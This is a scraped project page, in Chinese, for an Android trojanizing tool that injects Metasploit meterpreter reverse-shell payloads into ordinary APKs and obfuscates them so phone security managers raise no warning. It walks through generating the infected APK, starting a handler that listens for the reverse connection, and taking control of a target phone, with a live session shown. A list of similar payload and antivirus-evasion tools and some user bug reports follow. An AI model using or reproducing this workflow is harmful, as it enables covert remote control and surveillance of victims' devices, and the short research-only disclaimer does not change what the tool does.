对安卓APP注入MSF PAYLOAD,并且对手机管家进行BYPASS。

Overview

520_APK_HOOK

介绍

  • 将msf生成的payload,注入到一个正常的apk文件中,重新打包后进行加固,bypass手机安全管家的检测。

  • 项目地址: https://github.com/cleverbao/520apkhook

  • 作者: BaoGuo

优点

  • 相比于原始的msf远控,此版本app在进行远控时,被注入的app可以正常运行,原始msf生成的app程序,只在桌面上有一个图标,点击后没有任何app界面。

  • 注入后的app在安装时,手机管家不会有任何安全提示,原始msf生成的app程序,安装时手机管家会有安全警示。

重点说明

  • 项目目前由于加固脚本问题, 目前只支持单classes.dex文件操作.

  • 本项目仅用于安全研究, 禁止利用脚本进行攻击, 使用本脚本产生的一切问题和本人无关.

项目依赖

使用

  1. 使用Linux或者macos主机, 安装python3, openjdk8, metasploit-framework.
  2. 使用python3生成apk文件, 需要指定msf远控链接的IP和端口.
~ cd 520apkhook
➜  520apkhook python3 hook.py --lhost 192.168.0.21 --lport 1433 -n ./base.apk

[*] 创建随机字符串,用来修改msf payload!
[+] 生成成功!

[*] 检查电脑上的开发环境
================================

[:] NOTE : 请确认安装jdk8环境!

[*] 检查 : Jdk版本
javac 1.8.0_282
[+] JDK - OK
......

// --host 指定msf远控的IP
// --lport 指定msf远控端口
// -n 指定被注入的apk文件路径
  1. 生成中需要指定msf payload类型
➜  520apkhook python3 hook.py --lhost 192.168.0.21 --lport 1433 -n ./base.apk

[*] 创建随机字符串,用来修改msf payload!
[+] 生成成功!

[*] 检查电脑上的开发环境
================================

[:] NOTE : 请确认安装jdk8环境!

[*] 检查 : Jdk版本
javac 1.8.0_282
[+] JDK - OK

[*] 检查 : msfvenom
[+] msfvenom - OK

   ====================================
   [*] Available Types of Payload
   ====================================
   (1) android/meterpreter/reverse_tcp
   (2) android/meterpreter/reverse_http
   (3) android/meterpreter/reverse_https

[?] 选择msf payload (1/2/3): 1
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10192 bytes
......
  1. apk签名时需要输入证书的相关信息.
......
[*] 将加固后的dex文件替换apk中的class dex!
'classes.dex'...
[+] 插入成功 !
[+] app加固完成

[*] 创建app签名文件!
您的名字与姓氏是什么?
 [Unknown]:  zhouhongyi
您的组织单位名称是什么?
 [Unknown]:  360
您的组织名称是什么?
 [Unknown]:  qihu360
您所在的城市或区域名称是什么?
 [Unknown]:  beijing
您所在的省/市/自治区名称是什么?
 [Unknown]:  beijing
该单位的双字母国家/地区代码是什么?
 [Unknown]:  china
CN=zhouhongyi, OU=360, O=qihu360, L=beijing, ST=beijing, C=china是否正确?
 [否]:  y
......
  1. 在生成apk文件后, 目录下会产生Final_Infected.apkhandler.rc
➜  520apkhook ls
Final_Infected.apk base.apk           hook.py            libs
Readme.md          handler.rc         images
  1. 使用msfconsole加载handler.rc进行服务端监听
➜  520apkhook msfconsole -r handler.rc
# cowsay++
____________
< metasploit >
------------
      \   ,__,
       \  (oo)____
          (__)    )\
             ||--|| *


      =[ metasploit v6.0.42-dev-b177452c898ad956be8540a40c805bf52310c234]
+ -- --=[ 2124 exploits - 1137 auxiliary - 361 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: After running db_nmap, be sure to
check out the result of hosts and services

[*] Processing handler.rc for ERB directives.
resource (handler.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (handler.rc)> set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
resource (handler.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (handler.rc)> set LPORT 1433
LPORT => 1433
resource (handler.rc)> set exitonsession false
exitonsession => false
resource (handler.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 0.0.0.0:1433
msf6 exploit(multi/handler) >
......
  1. 将生成的apk文件在安卓手机进行安装, 即可完成对目标的控制

show

  1. 成功后, 可以在msf中进行远程控制
msf6 exploit(multi/handler) > sessions

Active sessions
===============

 Id  Name  Type                        Information         Connection
 --  ----  ----                        -----------         ----------
 1         meterpreter dalvik/android  u0_a53 @ localhost  192.168.0.21:1433 -> 192.168.0.68:65133 (192.168.16
                                                           4.194)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer    : localhost
OS          : Android 11 - Linux 5.4.61-********+ (armv81)
Meterpreter : dalvik/android
meterpreter > ls
No entries exist in /data/user/0/com.zhangy.vphone/files
meterpreter > app_list
Application List
================

 Name                                Package                               Running  IsSystem
 ----                                -------                               -------  --------
 Android System WebView              com.android.webview                   false    true
 Android 系统                          android                               false    true
 Android动态壁纸                         com.android.wallpaper                 false    true
 Arm Pro                             armadillo.studio                      false    false
 Black Hole                          com.android.galaxy4                   false    true
 Bluetooth MIDI Service              com.android.bluetoothmidiservice      false    true
 Call Log Backup/Restore             com.android.calllogbackup             false    true
 CaptivePortalLogin                  com.android.captiveportallogin        false    true
 HTML 查看程序                           com.android.htmlviewer                false    true
 Intent Filter Verification Service  com.android.statementservice          false    true
 KK谷歌助手                              io.kkzs                               false    true
 LOL GG                              com.hpdjyxsziq.sqmezcbpyf             false    false
 Live Wallpaper Picker               com.android.wallpaper.livepicker      false    true
 MT管理器                               bin.mt.plus                           false    false
 ......

不同手机安全管家对app安装时检测结果

  • 华为

huawei

  • 小米

mi

  • VIVO

oppo

You might also like...
PyFUD - Fully Undetectable payload generator for metasploit

PyFUD fully Undetectable payload generator for metasploit Usage: pyfud.py --host

Industry ready custom API payload with an easy format for building Python APIs (Django/Django Rest Framework)

Industry ready custom API payload with an easy format for building Python APIs (Django/Django Rest Framework) Yosh! If you are a django backend develo

Malware Configuration And Payload Extraction

CAPEv2 (Python3) has now been released CAPEv2 With the imminent end-of-life for Python 2 (January 1 2020), CAPEv1 will be phased out. Please upgrade t

Malware Configuration And Payload Extraction

CAPE: Malware Configuration And Payload Extraction CAPE is a malware sandbox. It is derived from Cuckoo and is designed to automate the process of mal

macOS Initial Access Payload Generator

Mystikal macOS Initial Access Payload Generator Related Blog Post: https://posts.specterops.io/introducing-mystikal-4fbd2f7ae520 Usage: Install Xcode

DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.
DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.

What is DNSStager? DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS. DNSStager will create a malic

HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

HatVenom HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures. Featu

Sudo type me a payload

payloadSecretary Sudo type me a payload Have you ever found yourself having to perform a test, and a client has provided you with a VM inside a VDI in

Tool To generate Stable Undetected Payload
Tool To generate Stable Undetected Payload

windowsPayload Tool To generate Stable Undetected Payload Don t Upload to Virus Total :) Follow on Social Media Platforms ScreenShots How to install +

Typhon is a macOS specific payload aimed at targetting Jamf managed devices.
Typhon is a macOS specific payload aimed at targetting Jamf managed devices.

Typhon is a macOS specific payload aimed at targetting Jamf managed devices. This payload can be used to manipulate macOS devices into communicating with a Mythic instance, which acts as a Jamf server with the ability to execute commands.

proxyshell payload generate

Py Permutative Encoding https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-pst/5faf4800-645d-49d1-9457-2ac40eb467bd Generate proxyshell

Extendable payload obfuscation and delivery framework
Extendable payload obfuscation and delivery framework

NSGenCS What Is? An extremely simple, yet extensible framework to evade AV with obfuscated payloads under Windows. Installation Requirements Currently

RCE 0-day for GhostScript 9.50 - Payload generator
RCE 0-day for GhostScript 9.50 - Payload generator

RCE-0-day-for-GhostScript-9.50 PoC for RCE 0-day for GhostScript 9.50 - Payload generator The PoC in python generates payload when exploited for a 0-d

Ducky Script is the payload language of Hak5 gear.

Ducky Script is the payload language of Hak5 gear. Since its introduction with the USB Rubber Ducky in 2010, Ducky Script has grown in capability while maintaining simplicity. Aided by Bash for logic and conditional operations, Ducky Script provides multi-vector functions for all Hak5 payload platforms.

Shellcode runner to execute malicious payload and bypass AV
Shellcode runner to execute malicious payload and bypass AV

buffshark-shellcode-runner Python Shellcode Runner to execute malicious payload and bypass AV This script utilizes mmap(for linux) and win api wrapper

Python script that sends CVE-2021-44228 log4j payload requests to url list

scan4log4j Python script that sends CVE-2021-44228 log4j payload requests to url list [VERY BETA] using Supply your url list to urls.txt Put your payl

Dumps the payload.bin image found in Android update images.
Dumps the payload.bin image found in Android update images.

payload dumper Dumps the payload.bin image found in Android update images. Has significant performance gains over other tools due to using multiproces

Skiller - With this payload you can control the target computer with (cmd)

Skiller - With this payload you can control the target computer with (cmd)

OTA APK Extractor - A script utilises payload dumper and image extractor tools to extract the apps from the system.img of an android OTA file
Comments
  • 注入完的APK打开空指针

    注入完的APK打开空指针

    对多个APK进行注入分别测试后,发现所有的app能够正常安装进入启动页面,后续就会造成空指针闪退 使用机型:小米9 系统版本:MIUI 12.5.6 JDK版本:ARM64 openjdk version "11.0.16" 2022-07-19 OpenJDK 64-Bit Python3版本:Python 3.10.5

    opened by bystart 2
  • 无法找到默认启动组件,输入路径提示文件不存在

    无法找到默认启动组件,输入路径提示文件不存在

    腾讯系列app无法找到App默认启动组件.method public onCreate()V,统一输入组件地址为WorkDir/dexfile/app/classes/com/tencent/tinker/loader/app/TinkerApplication.smali
    网易系列闪退暂未解决
    

    按照上面这个路径输入,提示文件不存在

    opened by hangpu8 0
Releases(init)
Owner
BaoGuo
BaoGuo
Malware Configuration And Payload Extraction

CAPE: Malware Configuration And Payload Extraction CAPE is a malware sandbox. It is derived from Cuckoo and is designed to automate the process of mal

Kevin O'Reilly 1k Dec 30, 2022
macOS Initial Access Payload Generator

Mystikal macOS Initial Access Payload Generator Related Blog Post: https://posts.specterops.io/introducing-mystikal-4fbd2f7ae520 Usage: Install Xcode

Leo Pitt 206 Dec 31, 2022
HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

HatVenom HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures. Featu

EntySec 100 Dec 23, 2022
Tool To generate Stable Undetected Payload

windowsPayload Tool To generate Stable Undetected Payload Don t Upload to Virus Total :) Follow on Social Media Platforms ScreenShots How to install +

youhacker55 117 Dec 30, 2022
proxyshell payload generate

Py Permutative Encoding https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-pst/5faf4800-645d-49d1-9457-2ac40eb467bd Generate proxyshell

Evi1cg 63 Nov 15, 2022
Extendable payload obfuscation and delivery framework

NSGenCS What Is? An extremely simple, yet extensible framework to evade AV with obfuscated payloads under Windows. Installation Requirements Currently

null 123 Dec 19, 2022
RCE 0-day for GhostScript 9.50 - Payload generator

RCE-0-day-for-GhostScript-9.50 PoC for RCE 0-day for GhostScript 9.50 - Payload generator The PoC in python generates payload when exploited for a 0-d

null 534 Dec 14, 2022
Ducky Script is the payload language of Hak5 gear.

Ducky Script is the payload language of Hak5 gear. Since its introduction with the USB Rubber Ducky in 2010, Ducky Script has grown in capability while maintaining simplicity. Aided by Bash for logic and conditional operations, Ducky Script provides multi-vector functions for all Hak5 payload platforms.

Abir Abedin Khan 6 Oct 7, 2022
Python script that sends CVE-2021-44228 log4j payload requests to url list

scan4log4j Python script that sends CVE-2021-44228 log4j payload requests to url list [VERY BETA] using Supply your url list to urls.txt Put your payl

elyesa 5 Nov 9, 2022
Dumps the payload.bin image found in Android update images.

payload dumper Dumps the payload.bin image found in Android update images. Has significant performance gains over other tools due to using multiproces

Rasmus 7 Nov 17, 2022